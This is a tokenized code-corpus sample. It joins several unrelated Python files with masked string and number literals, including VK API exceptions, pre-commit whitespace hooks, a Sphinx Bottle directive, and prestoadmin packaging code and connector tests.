<s> import unittest <EOL> import lcs <EOL> class TestLCS ( unittest . TestCase ) : <EOL> def test_lcs ( self ) : <EOL> self . assertEqual ( lcs . longest_common_subsequence ( "<STR_LIT>" , "<STR_LIT>" ) , ( <NUM_LIT:4> , "<STR_LIT>" ) ) <EOL> self . assertEqual ( lcs . longest_common_subsequence ( "<STR_LIT>" , "<STR_LIT>" ) , ( <NUM_LIT:4> , "<STR_LIT>" ) ) <EOL> self . assertEqual ( lcs . longest_common_subsequence ( "<STR_LIT>" , "<STR_LIT>" ) , ( <NUM_LIT:3> , "<STR_LIT>" ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> AUTHORIZATION_FAILED = <NUM_LIT:5> <EOL> PERMISSION_IS_DENIED = <NUM_LIT:7> <EOL> CAPTCHA_IS_NEEDED = <NUM_LIT> <EOL> ACCESS_DENIED = <NUM_LIT:15> <EOL> USER_IS_DELETED_OR_BANNED = <NUM_LIT> <EOL> INVALID_USER_ID = <NUM_LIT> <EOL> class VkException ( Exception ) : <EOL> pass <EOL> class VkAuthError ( VkException ) : <EOL> pass <EOL> class VkParseError ( VkAuthError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class VkPageWarningsError ( VkParseError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class VkAPIError ( VkException ) : <EOL> __slots__ = [ '<STR_LIT:error>' , '<STR_LIT:code>' , '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , vk_error_data ) : <EOL> super ( VkAPIError , self ) . __init__ ( ) <EOL> self . error_data = vk_error_data <EOL> self . code = vk_error_data . get ( '<STR_LIT>' ) <EOL> self . message = vk_error_data . get ( '<STR_LIT>' ) <EOL> self . request_params = self . get_pretty_request_params ( vk_error_data ) <EOL> self . redirect_uri = vk_error_data . get ( '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def get_pretty_request_params ( error_data ) : <EOL> request_params = error_data . get ( '<STR_LIT>' , ( ) ) <EOL> request_params = { param [ '<STR_LIT:key>' ] : param [ '<STR_LIT:value>' ] <EOL> for param in request_params } <EOL> return request_params <EOL> def is_access_token_incorrect ( self ) : <EOL> return all ( [ self . code == ACCESS_DENIED , <EOL> '<STR_LIT>' in self . message ] ) <EOL> def is_captcha_needed ( self ) : <EOL> return self . code == CAPTCHA_IS_NEEDED <EOL> def is_user_deleted_or_banned ( self ) : <EOL> return self . code == USER_IS_DELETED_OR_BANNED <EOL> @ property <EOL> def captcha_sid ( self ) : <EOL> return self . error_data . get ( '<STR_LIT>' ) <EOL> @ property <EOL> def captcha_img ( self ) : <EOL> return self . error_data . get ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> tokens = [ '<STR_LIT>' % self . code , <EOL> '<STR_LIT>' % self . message , <EOL> '<STR_LIT>' % self . 
request_params ] <EOL> if self . redirect_uri : <EOL> tokens . append ( '<STR_LIT>' % self . redirect_uri ) <EOL> return '<STR_LIT:U+002C>' . join ( tokens ) </s>
<s> from __future__ import print_function <EOL> import argparse <EOL> import fileinput <EOL> import os <EOL> import sys <EOL> from pre_commit_hooks . util import cmd_output <EOL> def _fix_file ( filename , markdown = False ) : <EOL> for line in fileinput . input ( [ filename ] , inplace = True ) : <EOL> if markdown and ( not line . isspace ( ) ) and ( line . endswith ( "<STR_LIT>" ) ) : <EOL> line = line . rstrip ( '<STR_LIT>' ) <EOL> if not line [ - <NUM_LIT:1> ] . isspace ( ) : <EOL> print ( line + "<STR_LIT:U+0020>" ) <EOL> continue <EOL> print ( line . rstrip ( ) ) <EOL> def fix_trailing_whitespace ( argv = None ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = [ ] , <EOL> default = argparse . SUPPRESS , <EOL> dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = '<STR_LIT>' , <EOL> default = [ '<STR_LIT>' ] , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:*>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( argv ) <EOL> bad_whitespace_files = cmd_output ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , * args . filenames , retcode = None <EOL> ) . strip ( ) . splitlines ( ) <EOL> md_args = args . markdown_linebreak_ext <EOL> if '<STR_LIT>' in md_args : <EOL> parser . error ( '<STR_LIT>' ) <EOL> all_markdown = '<STR_LIT:*>' in md_args <EOL> md_exts = [ '<STR_LIT:.>' + x . lower ( ) . lstrip ( '<STR_LIT:.>' ) <EOL> for x in '<STR_LIT:U+002C>' . join ( md_args ) . split ( '<STR_LIT:U+002C>' ) ] <EOL> for ext in md_exts : <EOL> if any ( c in ext [ <NUM_LIT:1> : ] for c in r'<STR_LIT>' ) : <EOL> parser . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . 
format ( ext ) <EOL> ) <EOL> if bad_whitespace_files : <EOL> for bad_whitespace_file in bad_whitespace_files : <EOL> print ( '<STR_LIT>' . format ( bad_whitespace_file ) ) <EOL> _ , extension = os . path . splitext ( bad_whitespace_file . lower ( ) ) <EOL> _fix_file ( bad_whitespace_file , all_markdown or extension in md_exts ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( fix_trailing_whitespace ( ) ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import unicode_literals <EOL> import pytest <EOL> from pre_commit_hooks . util import CalledProcessError <EOL> from pre_commit_hooks . util import cmd_output <EOL> def test_raises_on_error ( ) : <EOL> with pytest . raises ( CalledProcessError ) : <EOL> cmd_output ( '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ) <EOL> def test_output ( ) : <EOL> ret = cmd_output ( '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ) <EOL> assert ret == '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> import os . path <EOL> from cached_property import cached_property <EOL> import pre_commit . constants as C <EOL> from pre_commit . clientlib . validate_manifest import load_manifest <EOL> class Manifest ( object ) : <EOL> def __init__ ( self , repo_path_getter ) : <EOL> self . repo_path_getter = repo_path_getter <EOL> @ cached_property <EOL> def manifest_contents ( self ) : <EOL> manifest_path = os . path . join ( <EOL> self . repo_path_getter . repo_path , C . MANIFEST_FILE , <EOL> ) <EOL> return load_manifest ( manifest_path ) <EOL> @ cached_property <EOL> def hooks ( self ) : <EOL> return dict ( ( hook [ '<STR_LIT:id>' ] , hook ) for hook in self . manifest_contents ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import six <EOL> from docutils import nodes <EOL> from docutils . parsers . rst import directives <EOL> from docutils . statemachine import ViewList <EOL> from sphinx . util import force_decode <EOL> from sphinx . util . compat import Directive <EOL> from sphinx . util . nodes import nested_parse_with_titles <EOL> from sphinx . util . docstrings import prepare_docstring <EOL> from sphinx . pycode import ModuleAnalyzer <EOL> from sphinxcontrib import httpdomain <EOL> from sphinxcontrib . autohttp . common import http_directive , import_object <EOL> def translate_bottle_rule ( app , rule ) : <EOL> buf = six . StringIO ( ) <EOL> if hasattr ( app . router , "<STR_LIT>" ) : <EOL> iterator = app . router . parse_rule ( rule ) <EOL> else : <EOL> iterator = app . router . _itertokens ( rule ) <EOL> for name , filter , conf in iterator : <EOL> if filter : <EOL> buf . write ( '<STR_LIT:(>' ) <EOL> buf . write ( name ) <EOL> if ( filter != app . router . default_filter and filter != '<STR_LIT:default>' ) or conf : <EOL> buf . write ( '<STR_LIT::>' ) <EOL> buf . write ( filter ) <EOL> if conf : <EOL> buf . write ( '<STR_LIT::>' ) <EOL> buf . write ( conf ) <EOL> buf . write ( '<STR_LIT:)>' ) <EOL> else : <EOL> buf . write ( name ) <EOL> return buf . getvalue ( ) <EOL> def get_routes ( app ) : <EOL> for route in app . routes : <EOL> path = translate_bottle_rule ( app , route . rule ) <EOL> yield route . method , path , route <EOL> class AutobottleDirective ( Directive ) : <EOL> has_content = True <EOL> required_arguments = <NUM_LIT:1> <EOL> option_spec = { '<STR_LIT>' : directives . unchanged , <EOL> '<STR_LIT>' : directives . unchanged , <EOL> '<STR_LIT>' : directives . unchanged } <EOL> @ property <EOL> def endpoints ( self ) : <EOL> endpoints = self . options . get ( '<STR_LIT>' , None ) <EOL> if not endpoints : <EOL> return None <EOL> return frozenset ( re . 
split ( r'<STR_LIT>' , endpoints ) ) <EOL> @ property <EOL> def undoc_endpoints ( self ) : <EOL> undoc_endpoints = self . options . get ( '<STR_LIT>' , None ) <EOL> if not undoc_endpoints : <EOL> return frozenset ( ) <EOL> return frozenset ( re . split ( r'<STR_LIT>' , undoc_endpoints ) ) <EOL> def make_rst ( self ) : <EOL> app = import_object ( self . arguments [ <NUM_LIT:0> ] ) <EOL> for method , path , target in get_routes ( app ) : <EOL> endpoint = target . name or target . callback . __name__ <EOL> if self . endpoints and endpoint not in self . endpoints : <EOL> continue <EOL> if endpoint in self . undoc_endpoints : <EOL> continue <EOL> view = target . callback <EOL> docstring = view . __doc__ or '<STR_LIT>' <EOL> if not isinstance ( docstring , six . text_type ) : <EOL> analyzer = ModuleAnalyzer . for_module ( view . __module__ ) <EOL> docstring = force_decode ( docstring , analyzer . encoding ) <EOL> if not docstring and '<STR_LIT>' not in self . options : <EOL> continue <EOL> docstring = prepare_docstring ( docstring ) <EOL> for line in http_directive ( method , path , docstring ) : <EOL> yield line <EOL> def run ( self ) : <EOL> node = nodes . section ( ) <EOL> node . document = self . state . document <EOL> result = ViewList ( ) <EOL> for line in self . make_rst ( ) : <EOL> result . append ( line , '<STR_LIT>' ) <EOL> nested_parse_with_titles ( self . state , result , node ) <EOL> return node . children <EOL> def setup ( app ) : <EOL> if '<STR_LIT:http>' not in app . domains : <EOL> httpdomain . setup ( app ) <EOL> app . add_directive ( '<STR_LIT>' , AutobottleDirective ) </s>
<s> import os <EOL> import re <EOL> import pip <EOL> import sys <EOL> import urllib <EOL> from distutils . dir_util import remove_tree <EOL> from distutils import log as logger <EOL> try : <EOL> from setuptools import Command <EOL> except ImportError : <EOL> from distutils . core import Command <EOL> from packaging import package_dir <EOL> class bdist_prestoadmin ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ ( '<STR_LIT>' , '<STR_LIT:b>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:k>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> ] <EOL> default_virtualenv_version = '<STR_LIT>' <EOL> def build_wheel ( self , build_dir ) : <EOL> cmd = self . reinitialize_command ( '<STR_LIT>' ) <EOL> cmd . dist_dir = build_dir <EOL> self . run_command ( '<STR_LIT>' ) <EOL> cmd . finalize_options ( ) <EOL> wheel_name = cmd . get_archive_basename ( ) <EOL> logger . info ( '<STR_LIT>' , wheel_name + '<STR_LIT>' , build_dir ) <EOL> return wheel_name <EOL> def generate_install_script ( self , wheel_name , build_dir ) : <EOL> template = open ( os . path . join ( package_dir , <EOL> '<STR_LIT>' ) , '<STR_LIT:r>' ) <EOL> install_script = open ( os . path . join ( build_dir , <EOL> '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> if self . online_install : <EOL> extra_install_args = '<STR_LIT>' <EOL> else : <EOL> extra_install_args = '<STR_LIT>' <EOL> for line in template . readlines ( ) : <EOL> line = re . sub ( r'<STR_LIT>' , <EOL> extra_install_args , line ) <EOL> line = re . sub ( r'<STR_LIT>' , wheel_name , line ) <EOL> line = re . sub ( r'<STR_LIT>' , self . virtualenv_version , <EOL> line ) <EOL> install_script . write ( line ) <EOL> install_script . close ( ) <EOL> template . close ( ) <EOL> os . chmod ( os . path . 
join ( build_dir , '<STR_LIT>' ) , <NUM_LIT> ) <EOL> def package_dependencies ( self , build_dir ) : <EOL> thirdparty_dir = os . path . join ( build_dir , '<STR_LIT>' ) <EOL> requirements = self . distribution . install_requires <EOL> for requirement in requirements : <EOL> pip . main ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( thirdparty_dir ) , <EOL> '<STR_LIT>' , <EOL> requirement , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> pycrypto_whl = '<STR_LIT>' <EOL> pypi_pycrypto_url = '<STR_LIT>' + '<STR_LIT>' + pycrypto_whl <EOL> if sys . version . startswith ( '<STR_LIT>' ) : <EOL> alternate_interpreter_version = '<STR_LIT>' <EOL> else : <EOL> alternate_interpreter_version = '<STR_LIT>' <EOL> urllib . urlretrieve ( <EOL> pypi_pycrypto_url . format ( alternate_interpreter_version ) , <EOL> os . path . join ( <EOL> thirdparty_dir , <EOL> pycrypto_whl . format ( alternate_interpreter_version ) ) <EOL> ) <EOL> pip . main ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> thirdparty_dir , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( self . virtualenv_version ) ] ) <EOL> def archive_dist ( self , build_dir , dist_dir ) : <EOL> archive_basename = self . distribution . get_fullname ( ) <EOL> if self . online_install : <EOL> archive_basename += '<STR_LIT>' <EOL> else : <EOL> archive_basename += '<STR_LIT>' <EOL> archive_file = os . path . join ( dist_dir , archive_basename ) <EOL> self . mkpath ( os . path . dirname ( archive_file ) ) <EOL> self . make_archive ( archive_file , '<STR_LIT>' , <EOL> root_dir = os . path . dirname ( build_dir ) , <EOL> base_dir = os . path . basename ( build_dir ) ) <EOL> logger . info ( '<STR_LIT>' , archive_file ) <EOL> def run ( self ) : <EOL> build_dir = self . bdist_dir <EOL> self . mkpath ( build_dir ) <EOL> wheel_name = self . build_wheel ( build_dir ) <EOL> self . generate_install_script ( wheel_name , build_dir ) <EOL> if not self . online_install : <EOL> self . 
package_dependencies ( build_dir ) <EOL> self . archive_dist ( build_dir , self . dist_dir ) <EOL> if not self . keep_temp : <EOL> remove_tree ( build_dir ) <EOL> def initialize_options ( self ) : <EOL> self . bdist_dir = None <EOL> self . dist_dir = None <EOL> self . virtualenv_url_base = None <EOL> self . virtualenv_version = None <EOL> self . keep_temp = False <EOL> self . online_install = False <EOL> def finalize_options ( self ) : <EOL> if self . bdist_dir is None : <EOL> bdist_base = self . get_finalized_command ( '<STR_LIT>' ) . bdist_base <EOL> self . bdist_dir = os . path . join ( bdist_base , <EOL> self . distribution . get_name ( ) ) <EOL> if self . dist_dir is None : <EOL> self . dist_dir = '<STR_LIT>' <EOL> if self . virtualenv_version is None : <EOL> self . virtualenv_version = self . default_virtualenv_version </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from optparse import OptionGroup <EOL> _LOGGER = logging . getLogger ( __name__ ) <EOL> class HiddenOptionGroup ( OptionGroup ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parser , title , description = None , suppress_help = False ) : <EOL> OptionGroup . __init__ ( self , parser , title , description ) <EOL> self . suppress_help = suppress_help <EOL> def format_help ( self , formatter ) : <EOL> if not self . suppress_help : <EOL> return OptionGroup . format_help ( self , formatter ) <EOL> else : <EOL> return "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os <EOL> from nose . plugins . attrib import attr <EOL> from prestoadmin . standalone . config import PRESTO_STANDALONE_USER <EOL> from prestoadmin . util import constants <EOL> from tests . no_hadoop_bare_image_provider import NoHadoopBareImageProvider <EOL> from tests . product . base_product_case import BaseProductTestCase , docker_only , PrestoError <EOL> from tests . product . constants import LOCAL_RESOURCES_DIR <EOL> from tests . product . standalone . presto_installer import StandalonePrestoInstaller <EOL> class TestConnectors ( BaseProductTestCase ) : <EOL> def setup_cluster_assert_connectors ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_basic_connector_add_remove ( self ) : <EOL> self . setup_cluster_assert_connectors ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assert_path_removed ( self . cluster . master , <EOL> os . path . join ( constants . CONNECTORS_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] ] ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_path_removed ( host , <EOL> os . path . join ( constants . REMOTE_CATALOG_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> self . 
_assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def test_connector_add_remove_coord_worker_using_dash_h ( self ) : <EOL> self . setup_cluster_assert_connectors ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assert_path_removed ( self . cluster . master , <EOL> os . path . join ( constants . CONNECTORS_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] ] ) <EOL> for host in [ self . cluster . master , self . cluster . slaves [ <NUM_LIT:0> ] ] : <EOL> self . assert_path_removed ( host , <EOL> os . path . join ( constants . REMOTE_CATALOG_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:1> ] ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:2> ] ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assert_has_default_connector ( self . cluster . master ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:1> ] ) <EOL> def test_connector_add_remove_coord_worker_using_dash_x ( self ) : <EOL> self . setup_cluster_assert_connectors ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> self . assert_has_default_connector ( self . cluster . master ) <EOL> self . assert_has_default_connector ( self . cluster . slaves [ <NUM_LIT:0> ] ) <EOL> for host in [ self . cluster . slaves [ <NUM_LIT:1> ] , self . cluster . slaves [ <NUM_LIT:2> ] ] : <EOL> self . assert_path_removed ( host , <EOL> os . path . join ( constants . REMOTE_CATALOG_DIR , <EOL> '<STR_LIT>' ) ) <EOL> self . cluster . 
write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> for slave in [ self . cluster . slaves [ <NUM_LIT:1> ] , self . cluster . slaves [ <NUM_LIT:2> ] ] : <EOL> self . assert_has_default_connector ( slave ) <EOL> @ docker_only <EOL> def test_connector_add_wrong_permissions ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> script = '<STR_LIT>' '<STR_LIT>' <EOL> output = self . run_script_from_prestoadmin_dir ( script ) <EOL> with open ( os . path . join ( LOCAL_RESOURCES_DIR , <EOL> '<STR_LIT>' ) , '<STR_LIT:r>' ) as f : <EOL> expected = f . read ( ) % { '<STR_LIT>' : self . cluster . internal_master , <EOL> '<STR_LIT>' : self . cluster . internal_slaves [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . cluster . internal_slaves [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : self . cluster . internal_slaves [ <NUM_LIT:2> ] } <EOL> self . assertEqualIgnoringOrder ( expected , output ) <EOL> script = '<STR_LIT>' '<STR_LIT>' <EOL> output = self . run_script_from_prestoadmin_dir ( script ) <EOL> permission_error = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> self . assertEqualIgnoringOrder ( output , permission_error ) <EOL> script = '<STR_LIT>' '<STR_LIT>' <EOL> not_found_error = self . fatal_error ( <EOL> '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , not_found_error , <EOL> self . run_script_from_prestoadmin_dir , script ) <EOL> def test_connector_add_missing_connector ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> not_found_error = self . fatal_error ( <EOL> '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . 
assertRaisesRegexp ( OSError , not_found_error , <EOL> self . run_prestoadmin , '<STR_LIT>' ) <EOL> def test_connector_add_no_dir ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> '<STR_LIT>' ) <EOL> missing_dir_error = self . fatal_error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , missing_dir_error , <EOL> self . run_prestoadmin , '<STR_LIT>' ) <EOL> def test_connector_add_by_name ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def test_connector_add_empty_dir ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' ) <EOL> expected = """<STR_LIT>""" <EOL> self . assertEqualIgnoringOrder ( expected , output ) <EOL> def test_connector_add_two_connectors ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . cluster . 
write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> filepath = '<STR_LIT>' <EOL> self . assert_has_default_connector ( host ) <EOL> self . assert_file_perm_owner ( host , filepath , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_file_content ( host , filepath , '<STR_LIT>' ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def fatal_error ( self , error ) : <EOL> message = """<STR_LIT>""" <EOL> return message % { '<STR_LIT:error>' : error } <EOL> def test_connector_add_lost_host ( self ) : <EOL> installer = StandalonePrestoInstaller ( self ) <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , self . PA_ONLY_CLUSTER ) <EOL> self . upload_topology ( ) <EOL> installer . install ( ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . stop_host ( <EOL> self . cluster . slaves [ <NUM_LIT:0> ] ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' , raise_error = False ) <EOL> for host in self . cluster . all_internal_hosts ( ) : <EOL> deploying_message = '<STR_LIT>' '<STR_LIT>' <EOL> self . assertTrue ( deploying_message % host in output , <EOL> '<STR_LIT>' <EOL> % ( deploying_message % host , output ) ) <EOL> self . assertRegexpMatches ( <EOL> output , <EOL> self . down_node_connection_error ( self . cluster . internal_slaves [ <NUM_LIT:0> ] ) <EOL> ) <EOL> self . assertEqual ( len ( output . splitlines ( ) ) , <EOL> len ( self . cluster . all_hosts ( ) ) + <EOL> self . len_down_node_error ) <EOL> self . 
run_prestoadmin ( '<STR_LIT>' , raise_error = False ) <EOL> for host in [ self . cluster . master , <EOL> self . cluster . slaves [ <NUM_LIT:1> ] , <EOL> self . cluster . slaves [ <NUM_LIT:2> ] ] : <EOL> self . assert_has_default_connector ( host ) <EOL> self . _assert_connectors_loaded ( [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) <EOL> def test_connector_remove ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . assert_has_default_connector ( host ) <EOL> missing_connector_message = """<STR_LIT>""" <EOL> success_message = """<STR_LIT>""" <EOL> self . assertRaisesMessageIgnoringOrder ( <EOL> OSError , <EOL> missing_connector_message % { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> '<STR_LIT>' <EOL> ) <EOL> output = self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . assertEqualIgnoringOrder ( success_message , output ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> self . assertRaisesMessageIgnoringOrder ( <EOL> OSError , <EOL> missing_connector_message % { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> def test_connector_name_not_found ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> self . run_prestoadmin ( '<STR_LIT>' ) <EOL> self . cluster . write_content_to_host ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( constants . CONNECTORS_DIR , '<STR_LIT>' ) , <EOL> self . cluster . master <EOL> ) <EOL> expected = self . fatal_error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaisesRegexp ( OSError , expected , self . 
run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> def test_connector_add_no_presto_user ( self ) : <EOL> self . setup_cluster ( NoHadoopBareImageProvider ( ) , <EOL> self . STANDALONE_PRESTO_CLUSTER ) <EOL> for host in self . cluster . all_hosts ( ) : <EOL> self . cluster . exec_cmd_on_host ( <EOL> host , "<STR_LIT>" % ( PRESTO_STANDALONE_USER , ) ) <EOL> self . assertRaisesRegexp ( <EOL> OSError , "<STR_LIT>" , self . run_prestoadmin , <EOL> '<STR_LIT>' ) <EOL> def get_connector_info ( self ) : <EOL> output = self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data = self . get_key_value ( output , '<STR_LIT:data>' ) <EOL> next_uri = self . get_key_value ( output , '<STR_LIT>' ) <EOL> while not data and next_uri : <EOL> output = self . cluster . exec_cmd_on_host ( <EOL> self . cluster . master , <EOL> '<STR_LIT>' % self . get_key_value ( output , '<STR_LIT>' ) <EOL> ) <EOL> data = self . get_key_value ( output , '<STR_LIT:data>' 